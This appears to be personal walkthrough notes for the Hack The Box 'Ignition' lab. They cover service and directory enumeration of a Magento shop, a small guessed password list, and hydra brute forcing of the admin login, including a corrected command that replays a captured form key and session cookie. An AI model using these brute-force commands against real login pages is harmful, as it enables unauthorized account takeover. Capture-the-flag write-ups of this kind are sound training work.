06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp open  http    nginx 1.14.2
 
 * '-sV' probes the service and reports a version banner, but a banner alone can be wrong or
   incomplete (the box may be behind a proxy, or the interesting application sits behind nginx).
    - adding '-sC' runs Nmap's default NSE script set on each open port; the scripts add context
      (server header, page title, redirects) that the banner does not give
       - the default scripts are the "safe" category: they gather information without being
         intrusive or likely to disrupt the target

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Did not follow redirect to http://ignition.htb/

 * '-sC' runs the default set of Nmap scripts (NSE scripts), which include service enumeration,
   basic HTTP checks and similar low-impact probes. Note the http-title result here: the server
   answered with a redirect to http://ignition.htb/, which is the first hint that the web app
   routes on the Host header rather than the IP.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-enum: 
 |   /setup/: Potentially interesting folder
 |_  /soap/: Potentially interesting folder

 * '--script=vuln' runs the NSE scripts in the "vuln" category against the service on port 80
   (here: nginx fronting a PHP web application)
     - these cover a limited set of known issues and weak configurations (e.g. the XSS/CSRF
       probes and http-enum seen above)
        - no findings does NOT mean the service is patched; it only means none of the scripted
          checks matched. Treat the http-enum hits (/setup/, /soap/) as leads to inspect manually.

FOOTHOLD/COMPROMISE

Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
 Hmm. We’re having trouble finding that site.
 We can’t connect to the server at ignition.htb.
 
 * ip address redirected to http://ignition.htb
 
root@htb:~$ curl -v {targetIP:port}
 *   Trying 10.129.208.53:80...
 * Connected to 10.129.208.53 (10.129.208.53) port 80 (#0)
 > GET / HTTP/1.1
 > Host: 10.129.208.53
 > User-Agent: curl/7.88.1
 > Accept: */*
 > 
 < HTTP/1.1 302 Found
 < Server: nginx/1.14.2
 < Date: Sat, 22 Feb 2025 12:37:38 GMT
 < Content-Type: text/html; charset=UTF-8
 < Transfer-Encoding: chunked
 < Connection: keep-alive
 < Set-Cookie: PHPSESSID=5377km0035lm9f1hpf62b1a5q8; expires=Sat, 22-Feb-2025 13:37:38 GMT; Max-Age=3600; path=/; domain=10.129.208.53; HttpOnly; SameSite=Lax
 < Location: http://ignition.htb/
 
 * the application answers a request addressed by IP with a 302 to http://ignition.htb/, i.e. it
   routes on the Host header / its configured base URL rather than the IP
    - HTTP/1.1 302 Found ... Location: http://ignition.htb/
    - the browser then fails because ignition.htb does not resolve; map it locally in /etc/hosts
      (below) instead of following the redirect blindly
 
root@htb:~$ echo "10.129.208.53     ignition.htb" | sudo tee -a /etc/hosts
 10.129.208.53     ignition.htb
 
root@htb:~$ BROWSER > http://ignition.htb

 * possible vulnerable entry points
    - sign-in form
    - create account form
    - subscribe form
    - orders & returns form
    - contact web form
    - advanced search form
#directory enumeration
root@htb:~$ find / -iname 'directory-list*' 2>/dev/null
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

root@htb:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@htb:~$ which gobuster
 /usr/bin/gobuster

root@htb:~$ gobuster dir -u http://ignition.htb -w directory-list-2.3-small.txt
 /contact              (Status: 200) [Size: 28673]
 /home                 (Status: 200) [Size: 25802]
 /media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
 /0                    (Status: 200) [Size: 25803]
 /catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]
 /static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
 /admin                (Status: 200) [Size: 7092]
 /Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]
 ...
 
 * 'gobuster dir' is directory/file brute forcing against the given base URL
 * the -u is the target URL (use the hostname, not the IP, since the app redirects on Host)
 * the -w is the path to the wordlist
 * 'gobuster vhost' and its --append-domain option are for virtual-host (subdomain) enumeration
   and are NOT used for directory brute forcing
 * /admin returning 200 with a 7 KB body is the Magento admin login page; that is the target for
   the credential attack below
#conduct OSINT
root@htb:~$ BROWSER > googleSearch
 search: magento
 
 * Magento is a free, open-source e-commerce platform that helps businesses create and manage online stores. It's written in PHP and uses the Open Software Licens
 
root@htb:~$ BROWSER > googleSearch
 search: magento default credentials
  username: admin
   * Magento does not ship a default admin password; the admin user and password are chosen at
     install time. "admin" is simply the most common choice, so it is a guess, not a known default.

root@htb:~$ BROWSER > googleSearch
 search: most common password list
 ...

root@htb:~$ nano commonPWs.txt
 admin123
 root123
 password1
 administrator1
 changeme1
 password123
 qwerty123
 administrator123
 changeme123
 
#brute force

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: http://ignition.htb/admin
 
 Requests
 ...
 POST /admin HTTP/1.1
 Host: ignition.htb
 Content-Length: 78
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://ignition.htb
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://ignition.htb/admin
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: admin=cd4juor0dcuu0pid746li0jdqr
 Connection: close

 form_key=vEO8avkyPjmLQrhI&login%5Busername%5D=admin&login%5Bpassword%5D=qerty1

root@htb:~$ hydra -l admin -P commonPWs.txt ignition.htb http-post-form "/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302"
 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 07:31:36
 [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:1/p:9), ~1 try per task
 [DATA] attacking http-post-form://ignition.htb:80/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302
 [80][http-post-form] host: ignition.htb   login: admin   password: root123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme123
 [80][http-post-form] host: ignition.htb   login: admin   password: password123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator123
 [80][http-post-form] host: ignition.htb   login: admin   password: admin123
 [80][http-post-form] host: ignition.htb   login: admin   password: password1
 [80][http-post-form] host: ignition.htb   login: admin   password: qwerty123
 1 of 1 target successfully completed, 9 valid passwords found

 * the login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^ part reproduces the form parameters
    - the exact parameter names come from the captured Burp request (or the browser's dev tools)
    - 'S=302' tells hydra to treat an HTTP 302 as a successful login. That is the wrong condition
      for this target: hydra reported all 9 of 9 passwords as valid, which is impossible. Magento
      also answers a FAILED login with a 302 back to /admin, so every attempt "succeeds".
       - the captured request (above) also carries a form_key and the 'admin' session cookie; the
         hydra command sends neither, so the server rejects each attempt before it ever checks the
         password
       - fix: reuse a form_key and its matching session cookie from a captured request, and match
         on the error message a wrong password produces rather than on the redirect, e.g.
         hydra -l admin -P commonPWs.txt -t 1 ignition.htb http-post-form "/admin:form_key=vEO8avkyPjmLQrhI&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:H=Cookie: admin=cd4juor0dcuu0pid746li0jdqr:F=incorrect"
         First confirm with one manual wrong-password attempt that the page shows the sign-in
         error (not a form-key error) and copy the exact failure text into the F= condition.
       - keep the thread count low (-t 1): Magento can lock the admin account after repeated
         failures, which would silently turn every later guess into a false negative
       - of the nine candidates only one is actually accepted; verify the hit in the browser
         before moving on
         
  * Congratulations, your flag is: 797d6c988d9dc5865e010b9410f247e0
